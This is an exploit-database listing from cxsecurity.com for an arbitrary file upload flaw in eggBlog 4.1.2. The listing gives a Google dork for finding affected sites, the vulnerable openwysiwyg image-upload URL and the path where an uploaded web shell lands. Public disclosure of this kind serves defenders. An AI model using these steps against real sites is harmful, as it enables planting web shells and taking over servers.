eggBlog Arbitrary File Upload Vulnerability

2013.05.01
Credit: Pokk3rs
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: eggBlog Arbitrary File Upload Vulnerability # Google Dork:"powered by eggBlog.net" # Date: 28/04/2013 # Exploit Author: Pokk3rs # Vendor Homepage: http://eggblog.net/ # Software Link: http://sourceforge.net/projects/eggblog/files/eggBlog%204/v4.1.2/ # Tested on: Win8 Pro x64 Expl0itation 1 - Google Dork:"powered by eggBlog.net" 2 - http://server/[path]/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg= 3 - http://server/[path]/photos/uploads/shell.php.jpg #

References:

http://sourceforge.net/projects/eggblog/files/eggBlog%204/v4.1.2/
http://eggblog.net/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top